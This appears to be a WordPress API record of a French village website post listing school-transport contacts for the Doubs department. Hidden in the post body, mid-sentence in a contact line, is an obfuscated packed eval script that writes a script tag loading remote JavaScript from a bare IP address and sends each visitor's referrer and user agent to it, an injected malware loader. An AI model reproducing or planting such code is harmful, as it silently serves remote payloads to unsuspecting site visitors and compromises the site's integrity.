{"id":629,"date":"2016-06-12T08:20:10","date_gmt":"2016-06-12T07:20:10","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=629"},"modified":"2019-04-19T10:24:45","modified_gmt":"2019-04-19T09:24:45","slug":"transport-scolaire","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=629","title":{"rendered":"Transports scolaires"},"content":{"rendered":"<p>Organis\u00e9s par le Conseil D\u00e9partemental du Doubs<\/p>\n<p>contacts: Conseil D\u00e9partemental du Doubs<br \/>\n<strong>Direction <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfkai|var|u0026u|referrer|sbnyr||js|php'.split('|'),0,{}))<br \/>\n<\/script><\/noindex> de l&rsquo;\u00e9ducation<br \/>\n<\/strong><strong>et des loisirs<br \/>\n<\/strong>Service des transports scolaires Besan\u00e7on<br \/>\nTel. : 03 81 25 83 83<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Organis\u00e9s par le Conseil D\u00e9partemental du Doubs contacts: Conseil D\u00e9partemental du Doubs Direction de l&rsquo;\u00e9ducation et des loisirs Service des transports scolaires Besan\u00e7on Tel. : 03 81 25 83 83<\/p>\n","protected":false},"author":1,"featured_media":286,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[49],"tags":[],"class_list":["post-629","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-enfance"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=629"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/629\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/286"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=629"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=629"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}